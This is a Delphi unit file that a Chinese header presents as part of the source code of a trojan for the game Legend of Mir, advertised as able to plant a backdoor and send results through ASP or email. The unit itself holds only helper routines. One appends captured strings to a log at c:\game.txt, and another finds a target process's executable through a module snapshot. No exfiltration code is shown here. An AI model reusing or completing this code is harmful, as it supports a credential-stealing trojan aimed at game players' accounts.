unithooktype.pas

传奇木马原代码 DELPHI编写 可设置后门 ASP和邮箱发信两种设置

unit UnitHookType;

interface

uses windows, TLHelp32;

procedure WriteDat(s: string; datfile: string = 'c:\game.txt');
function GetModalName(processid: Thandle;ext:string=''): string;
function extractfilename(const filename: string): string;
function AnsiCompareText(const S1, S2: string): Integer;
function ExtractFileExt(const FileName: string): string;
const
  fmOpenRead       = $0000;
  fmOpenWrite      = $0001;
  fmOpenReadWrite  = $0002;
  fmShareDenyNone  = $0030;
type
  LongRec = packed record
    case Integer of
      0: (Lo, Hi: Word);
      1: (Words: array [0..1] of Word);
      2: (Bytes: array [0..3] of Byte);
  end;

implementation

function FileAge(const FileName: string): Integer;
var
  Handle: THandle;
  FindData: TWin32FindData;
  LocalFileTime: TFileTime;
begin
  Handle := FindFirstFile(PChar(FileName), FindData);
  if Handle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(Handle);
    if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
    begin
      FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
      if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi,
        LongRec(Result).Lo) then Exit;
    end;
  end;
  Result := -1;
end;

function FileExists(const FileName: string): Boolean;
begin
  Result := FileAge(FileName) <> -1;
end;


function FileOpen(const FileName: string; Mode: LongWord): Integer;
const
  AccessMode: array[0..2] of LongWord = (
    GENERIC_READ,
    GENERIC_WRITE,
    GENERIC_READ or GENERIC_WRITE);
  ShareMode: array[0..4] of LongWord = (
    0,
    0,
    FILE_SHARE_READ,
    FILE_SHARE_WRITE,
    FILE_SHARE_READ or FILE_SHARE_WRITE);
begin
  Result := -1;
  if ((Mode and 3) <= fmOpenReadWrite) and
    ((Mode and $F0) <= fmShareDenyNone) then
    Result := Integer(CreateFile(PChar(FileName), AccessMode[Mode and 3],
      ShareMode[(Mode and $F0) shr 4], nil, OPEN_EXISTING,
      FILE_ATTRIBUTE_NORMAL, 0));
end;

function FileSeek(Handle, Offset, Origin: Integer): Integer;
begin
{$IFDEF MSWINDOWS}
  Result := SetFilePointer(THandle(Handle), Offset, nil, Origin);
{$ENDIF}
{$IFDEF LINUX}
  Result := __lseek(Handle, Offset, Origin);
{$ENDIF}
end;

function FileCreate(const FileName: string): Integer;
begin
  Result := Integer(CreateFile(PChar(FileName), GENERIC_READ or GENERIC_WRITE,
    0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0));
end;

function FileWrite(Handle: Integer; const Buffer; Count: LongWord): Integer;
begin
{$IFDEF MSWINDOWS}
  if not WriteFile(THandle(Handle), Buffer, Count, LongWord(Result), nil) then
    Result := -1;
{$ENDIF}
{$IFDEF LINUX}
  Result := __write(Handle, Buffer, Count);
{$ENDIF}
end;

procedure FileClose(Handle: Integer);
begin
{$IFDEF MSWINDOWS}
  CloseHandle(THandle(Handle));
{$ENDIF}
{$IFDEF LINUX}
  __close(Handle); // No need to unlock since all locks are released on close.
{$ENDIF}
end;

procedure WriteDat(s: string; datfile: string = 'c:\game.txt');
var
  h: integer;
begin
  if fileexists(datfile) then
  begin
    h := fileopen(datfile, fmOpenWrite);
    fileseek(h, 0, 2);
      //deletefile(datfile);
  end
  else h := filecreate(datfile);
  if h = -1 then exit;
  s := s + #$0D + #$0A;
  FileWrite(h, s[1], length(s));
  FileClose(h);
end;

function ExtractFileExt(const FileName: string): string;
var
  I: Integer;
begin
  i:=length(filename);
  while i>=1 do
  begin
    if filename[i]='.' then
    begin
      result:=copy(filename,i,maxint);
      exit;
    end;
    dec(i);
  end;
  result:='';
end;

function AnsiCompareText(const S1, S2: string): Integer;
begin
  Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1),
    Length(S1), PChar(S2), Length(S2)) - 2;
end;

function GetModalName(processid: Thandle;ext:string=''): string;
var
  ModuleListHandle: THandle;
  ModuleStruct: TMODULEENTRY32;
  Yn: boolean;
  path:string;
begin
  result:='';
  ModuleListHandle := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, processid);
  ModuleStruct.dwSize := sizeof(ModuleStruct);
  //GetModuleFileName(, filename, sizeof(filename));
  yn:=Module32First(ModuleListHandle, ModuleStruct);
  while (yn) do
  begin
    path:=extractfileext(ModuleStruct.szExePath);
    if (ansicomparetext(path,'.EXE')=0)or
       ((ext<>'')and(ansicomparetext(path,ext)=0)) then
    begin
      result := ModuleStruct.szExePath;
      break;
    end;
    yn := Module32Next(ModuleListHandle, ModuleStruct);
  end;
  CloseHandle(ModuleListHandle);
end;

function extractfilename(const filename: string): string;
var
  I: Integer;
begin
  i:=length(filename);
  while i>=1 do
  begin
    if (filename[i]='/')or(filename[i]='\')or(filename[i]=':') then
    begin
      result:=copy(filename,i+1,maxint);
      exit;
    end;
    dec(i);
  end;
  result:=filename;
end;

function UpperCase(const S: string): string;
var
  Ch: Char;
  L: Integer;
  Source, Dest: PChar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'a') and (Ch <= 'z') then
      Dec(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

end.